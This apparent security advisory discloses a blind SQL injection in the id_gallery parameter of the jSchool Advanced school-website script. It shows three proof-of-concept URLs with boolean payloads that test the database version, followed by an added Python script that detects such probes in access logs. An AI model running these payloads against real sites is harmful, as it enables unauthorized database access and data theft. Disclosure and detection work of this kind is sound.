jSchool is a professional educational website script. The index.php file in jSchool has a SQL injection vulnerability, which may lead to leakage of sensitive information.
[+] Info:
~~~~~~~~~
jSchool Advanced (Blind SQL Injection) Vulnerability
-----------------------------------------------------------------------
Author: Don Tukulesto (root@indonesiancoder.com)
Site: http://indonesiancoder.com
Vendor: http://jogjacamp.com
Software: jSchool Advanced (http://www.jogjacamp.com/script_4_Script_Website_Murah_Instant_Sekolah.html)
Price: Rp. 1.200.000
GMT + November 21, 2010
[+] Poc:
~~~~~~~~~
http://server/index.php?action=gallery.list&id_gallery=5
http://server/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=5 # TRUE
http://server/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=4 # FALSE
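An added example, not part of the original advisory: a Python check for web access logs that reports requests to index.php whose id_gallery value is not a plain integer, grouped per client. It assumes common log format and that the TRUE and FALSE cases of the PoC return pages of different sizes; the log lines, addresses, sizes and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); addresses and sizes are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2010:10:00:01 +0700] "GET /index.php?action=gallery.list&id_gallery=5 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Nov/2010:10:00:05 +0700] "GET /index.php?action=gallery.list&id_gallery=5%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Nov/2010:10:00:06 +0700] "GET /index.php?action=gallery.list&id_gallery=5%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 812
203.0.113.7 - - [21/Nov/2010:10:00:09 +0700] "GET /index.php?action=news.list HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')

def tampered_ids(log_text, param="id_gallery"):
    """Yield (client, value, response_size) for requests whose param is not a plain integer."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes and splits each pair on the first '=' only,
        # so an injected "...=5" tail stays inside the parameter value.
        for value in parse_qs(url.query).get(param, []):
            if not re.fullmatch(r"\d+", value):
                yield client, value, 0 if size == "-" else int(size)

def summarize(log_text):
    """Group tampered requests per client; differing sizes suggest a TRUE/FALSE oracle."""
    per_client = defaultdict(lambda: {"values": [], "sizes": set()})
    for client, value, size in tampered_ids(log_text):
        per_client[client]["values"].append(value)
        per_client[client]["sizes"].add(size)
    return {
        c: {"requests": len(d["values"]), "values": d["values"],
            "boolean_oracle": len(d["values"]) >= 2 and len(d["sizes"]) >= 2}
        for c, d in per_client.items()
    }

if __name__ == "__main__":
    for client, info in summarize(SAMPLE_LOG).items():
        print(client, info)
```

A non-integer id_gallery value is the primary signal; the size comparison only ranks clients and will miss probes whose responses differ by timing or content rather than length.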
[+] Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/15595
From: pulog.org